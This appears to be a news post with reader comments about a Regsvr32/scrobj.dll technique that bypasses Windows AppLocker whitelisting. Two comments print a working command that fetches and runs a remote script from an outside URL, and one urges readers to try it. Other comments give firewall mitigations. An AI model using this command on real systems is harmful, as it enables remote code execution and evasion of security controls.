Core Windows Utility Can Be Used To Bypass Whitelisting

Reader msm1267 writes: A core Windows command-line utility, Regsvr32, used to register DLLs to the Windows Registry can be abused to run remote code from the Internet, bypassing whitelisting protections such as Microsoft's AppLocker. A researcher who requested anonymity found and recently privately disclosed the issue to Microsoft. It's unknown whether Microsoft will patch this issue with a security bulletin, or in a future release. Regsvr32, also known as Microsoft Register Server, is a Microsoft-signed binary that runs as default on Windows. The researcher's proof-of-concept allows him to download and run JavaScript or VBScript from a URL provided via the command line. "There's really no patch for this; it's not an exploit. It's just using the tool in an unorthodox manner. It's a bypass, an evasion tactic," the researcher said.The Register reports: "It's built-in remote code execution without admin rights and which bypasses Windows whitelisting. I'd say it's pretty bad," said Alex Ionescu, a Windows and ARM kernel guru. The trick -- Smith didn't want to call it an exploit -- is neat because it does not touch the Registry, does not need administrator rights, can be wrapped up in an encrypted HTTP session, and should leave no trace on disk as it's a pure to-memory download. No patch exists for this, although regsvr32 can be firewalled off from the internet. Microsoft was not available for immediate comment.

Re:Real issue is whitelist bypass

The real issue is that regsvr32 understands URL's:

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

Running this tells Windows to fetch an XML file from the internet, which tells it to run cmd.exe. The magic here is that if you change cmd.exe for any program outside the AppLocker whitelist, bingo: it will start, in theory. regsvr32 is part of the operating system and can be used to register and unregister COM script files with the Windows Registry. /s tells regsvr32 to be silent, /n tells it not to use DllRegisterServer, /i passes an optional parameter (our URL) to DLLinstall, /u means we're trying to unregister an object, and scrobj.dll is Microsoft's Script Component Runtime.

Easy Fix - No Patch Required

[Mr.Intel]

It's a PowerShell command: New-NetFirewallRule -DisplayName "Block Regsrvr32" -Program "%SystemRoot%\System32\regsvr32.exe" -Direction Outbound -Action Block

Re:Real issue is whitelist bypass

[geek111]

This exploit does not need admin rights. I just tried it. the request for admin rights only happens when a DLL is registered/unregistered. The flag /n prevents DLLRegisterServer from being used which defers the permission check.

The real trick here is that regsrvr32.dll will take a URL instead of a file as a script. No one had tried that before.

(Scared me enough I made a new firewall rule blocking outbound connections from regsrvr32.dll.)

Anyone who wants to try the proof-of-concept just open a command prompt and enter (from the article) -

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

Nope

[The+MAZZTer]

regsvr32 does not understand DLLs. scrobj.dll does... the contents of the /i switch are passed in to the DLL. Looks like the DLL is the one with the problem.Documentation

I expect most admins can simply block or remove the DLL with little impact on their system unless they are running some obscure program that requires it. Or, as another user suggested, firewall regsvr32 so it can't download files.